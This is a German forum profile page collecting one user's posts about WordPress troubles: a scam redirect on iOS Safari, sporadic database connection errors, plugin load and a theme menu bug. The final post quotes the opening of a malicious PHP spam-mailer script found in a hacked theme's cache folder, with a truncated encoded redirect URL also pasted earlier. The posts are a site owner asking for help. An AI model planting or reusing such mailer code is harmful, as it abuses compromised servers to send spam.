Beiträge von Worderei

    Nochmals an alle bisher, die helfen wollten: Es liegt NICHT an den Devices. Ich habe ein neues iPhone 7 z.B. genutzt und die Weiterleitung passiert. Jedoch ist sie recht intelligent und kommt nur einmal.

    Folgenden Code konnte ich beim Safari während der Weiterleitung aus der Adresszeile kopieren:

    Zitat

    data:text/html,%3C%21DOCTYPE%20html%3E%3Chtml%20lang%3D%22en%22%20xmlns%3D%22http%3A//http://www.w3.org/1999/html%22%3…y%3E%3C/html%3E

    Wie finde ich, an welcher Stelle der im Theme eingefügt wurde? Ich lese da nur "clarityad.online"... und document.addEventListener.

    Hallo,

    vielen Dank für eure Tipps. Leider hat bisher nichts geholfen:
    - sucuri und weitere Tests habe ich ohne Ergebnis durchgeführt, die Seite schein nicht infiziert zu sein,
    - das Theme ist ein Premium-Kauftheme und scheint soweit okay zu sein, Wordpress ist aktuell,
    - zahlreiche Plugins sind aktiv, aber eigentlich nur die großen bekannten für SEO, Sicherheit und Speed.
    - als Hoster nutze ich einen vServer bei Host Europe.

    (Ich setze Adsense ein auf der Seite)

    Argh.

    Hallo,

    auf meinem Wordpress geht ein Fenster auf, wonach man etwas gewonnen hat. Geht man auf schließen wird man automatisch weitergeleitet auf "eu(dot)istanbilcall(dot)xyz". Dort steht dann als Text, "Herzlichen Glückwunsch Google Benutzer, Sie sind heute Gewinner!".

    Das Problem tritt offenbar nur auf iOS Safari auf. Dort öffnet sich das Fenster aber auch nicht jedes Mal. Auf dem Desktop mit Windows 10 habe ich es noch nie gesehen.

    Ich habe mir schon die php nach ungewöhnlichem Code durchgeschaut, ein Antiviren-Plugins übers Theme laufen lassen sowie mit AVG den gesamten Webspace gescannt. In der Google-WMT gibt es keine Warnmeldung.

    Wie finde und beseitige ich die Ursache?

    Danke. Weiter beobachtet habe ich es. Die Ausfälle treten nicht mehr so gehäuft auf. Da ich am System nix geändert habe, dürfte wohl der Fehler bei Hosteurope liegen. Entsprechend bin ich mega sauer, dass ich von denen keine verlässliche / ehrliche Aussage bekomme. Einen halben Tag war dann mal der Server down, wegen technischer Probleme. Wahrscheinlich wurde da mal wieder was geschraubt.

    Da ich bereits lange Probleme mit Hosteurope habe, kann ich deren Angebot für Wordpress nicht empfehlen. Also, wenn ihr ein Hosting für eure Wordpress-Blogs und Seiten sucht, dann geht nicht zu denen!

    Edt.: Nochmal zur Klarstellung, es handelt sich hierbei nicht um ein 2 Euro shared Hosting, sondern einen 30 Euro vServer.

    Danke für deine Anwort Uwe_EF,

    Hosteurope sagt, dass gestern z.B. die Bots von Bing und Google dafür verantwortlich sind, dass die CPU voll augelastet war. Ich habe einen virtuellen Webserver mit 2GB und Google Pagespeed misst 1,5 Sekunden Reaktionszeit. Caching-Plugin brachte eine Seitenladezeit von 1,8 Sekunden.

    Hallo,

    oben genannte Fehlermeldung ist bei mir zum Hausgast geworden. Kann mir jemand erklären, bei welchen Cases die genaus ausgegeben wird? Man liest immer nur über die wp-config.php und beschädigte Datenbanken. Aber beides kann ich ausschließen, da es nur sporadisch auftritt, nicht jedoch unbedingt zu besonderen Lastzeiten. Kurz: ich bin langsam etwas ratlos. Wie würde man das Problem denn analysieren?

    Vielen Dank
    Worderei

    Danke Leute, hab mich mal angeregt gefühlt und per WPOptimize die Datenbank mi den Optionseinstellungen "gereinigt". Da waren 9000 Datensätze vorhanden, die Plugins selbst waren nicht aktiv, aber wohl irgendwo virtuell verzeichnet. Trotzdem seltsam. Falls das jemand liest: vorher bitte gut Datenbank-Backup sicher, mit nem DB-Plugin habe ich mir schon mal die Seite komplett gecrashed.

    Ich habe soeben P3 Plugin Profiler laufen lassen, um zu sehen welche Plugins zuviel Last erzeugen. Dabei werden gleich mehrere Plugins angezeigt, welche ich deaktiviert und deinstalliert (und teils durch bessere ersetzt habe). Dazu gehören z.B. Secure Wordpress und Wp Security Scan welche beide gelöscht wurden und trotzdem noch als Last aufgeführt sind. Auch ein Amazon Widget Plugin wird angezeigt als aktiv.

    Wie kann das sein?

    Sind die Plugins "heimlich" weiter aktiv? Wie kann ich sie dann endgüldig deaktivieren?
    Oder ist das nur ein Schatten? Die Seite ist nicht gecached...

    Hallo,

    gibt es gute Beispiele, wie man Werbung auf mobilen Seiten platziert?

    Ich habe gesehen, dass einige Seiten beim Aufruf übers Smartphone ganz unten einen Banner über den Content legen, so einen 320x50. Wie realisiert man das?

    Wäre auch an einem Erfahrungsaustausch interessiert.

    Worderei

    Deine Fragen sind ja sehr strukturiert. Auch mich "nervt" das ständige geupdate, da es kaum neue Funktionen bringt, die man als normaler Blogger braucht, dafür aber oftmals Probleme mit veralteten Plugins. Trotzdem halte ich meine Seite auf der aktuellen Version, da mit den Updates auch für die Sicherheit getan wird. Entsprechend richtet sich meine Update-Unwilligkeit dann eher auf die ganzen Betrüger, die mit fremder Arbeit ihren Unterhalt verdienen wollen und Sicherheitslücken für ihre illegalen Zwecke nutzen.

    Was sagt die Fehlermeldung "Aufbau einer Datenbankverbindung" aus, wenn sie sporadisch auftritt und auch nicht zu Hochlastzeiten?

    Hintergrund:

    Mein bei Host Europe gehostestes (WebServer Basic 5 XL mit ) Wordpress-Blog (immer aktuell, derzeit also 3.8) zeigt schon seit Monaten und relativ häufig beim Aufruf die Fehlermeldung "Fehler beim Aufbau einer Datenbankverbindung".

    Die Seite läuft seit zwei Jahren, hat viel Content und entsprechend habe ich an einen Fehler in der Datenbank gedacht - die "Reinigungs-Plugins" zeigten aber keine Verbesserung bzw. überhaupt irgendwelche Unregelmässigkeiten.

    Die Google Webmaster-Tools zeigen mir an, dass das nicht nur ein lokaler Fehler bei mir ist. Viele Crawling-Versuche enden mit einem 404.

    Was kann ich tun? Was ist die Ursache?

    Derartige Probleme mit Filezilla kenne ich. Es kommt z.B. vor, dass ich eine Datei lösche, sie verschwindet auch. Trotzdem ist sie dann noch immer vorhanden. Bisher habe ich kein anderes FTP-Tool und logge mich lieber in die Dateiverwaltung meines Hosters ein, um Dateien zu berarbeiten.

    Nach dem Update von 3.6 auf 3.7 funktioniert die im Theme mitglieferte Funktion
    Exclude categories from the navigation bar


    nicht mehr. Es werden alle Kategorien in der Nav-Leiste angezeigt auf der Startseite. Gibt es irgendwelche Änderungen, welche diese Funktion zunichte machen?

    Der Code in meiner Header.php lautet:

    PHP
    <div id="cat-nav-content"> 
                        
                        <?php $menuClass = 'superfish nav clearfix';
                        $secondaryNav = '';
                        
                        if (function_exists('wp_nav_menu')) $secondaryNav = wp_nav_menu( array( 'theme_location' => 'secondary-menu', 'container' => '', 'fallback_cb' => '', 'menu_class' => $menuClass, 'echo' => false ) );
                        if ($secondaryNav == '') show_categories_menu($menuClass);
                        else echo($secondaryNav); ?>

    Danke für die Zielvorgaben. Nur welche Tools sind dafür geeignet?

    Rechteprüfung:
    Gibt es irgendwo eine Übersicht, wie die Rechte gesetzt sein müssen?

    Dateiprüfung:
    Leider ist das Webverzeichnis gesperrt, sodass ich keine externen Tools nutzen kann. Was nutzt man dann?

    Hallo,

    im Cache-Verzeichnis meines Themes befindet sich erneut eine Datei, welche massenhaft Spam an kolumbianische Adressen verschickt. Der Hoster hat mein Paket gesperrt. Erst vor einer Woche hatte ich dies. Damals löschte ich die Datei sowie einen Trojaner und updatete mein Wordpress. Nun sind aber Wordpress und alle Plugins aktuell. Wie finde ich die offenbar immer noch vorhandene Sicherheitslücke?

    Die schadhafte Datei sieht wie folgt aus:

    <?php
    @set_time_limit(0);
    if(isset($_POST['Enoc']))
    {
    $message = $_POST['html'];
    $subject = $_POST['assunto'];
    $de = $_POST['de'];
    $nombre = $_POST['RealName'];
    $ellos = $_POST['ellos'];

    $message = urlencode($message);
    $message = ereg_replace("%5C%22", "%22", $message);
    $message = urldecode($message);
    $message = stripslashes($message);

    }else{
    $testa ="";
    $message = "<html><body><h1>hola my friend, How are u ?</h1></body></html>";
    $subject = $_SERVER["HTTP_HOST"];
    $nombre = "Moe Greene";
    $de = "is_a_t@unenvio.com";
    $ellos = "mail@hotmail.com";
    }
    ?>
    <html>
    <head>
    <title> Mailer by Sphinx</title></head>